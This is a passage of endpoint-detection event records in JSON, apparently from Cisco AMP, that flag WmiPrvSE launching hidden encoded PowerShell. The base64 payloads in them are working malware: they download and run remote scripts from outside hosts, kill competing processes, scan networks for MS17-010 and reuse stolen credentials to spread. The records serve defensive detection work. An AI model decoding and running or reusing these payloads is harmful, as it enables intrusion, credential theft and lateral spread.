QAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4A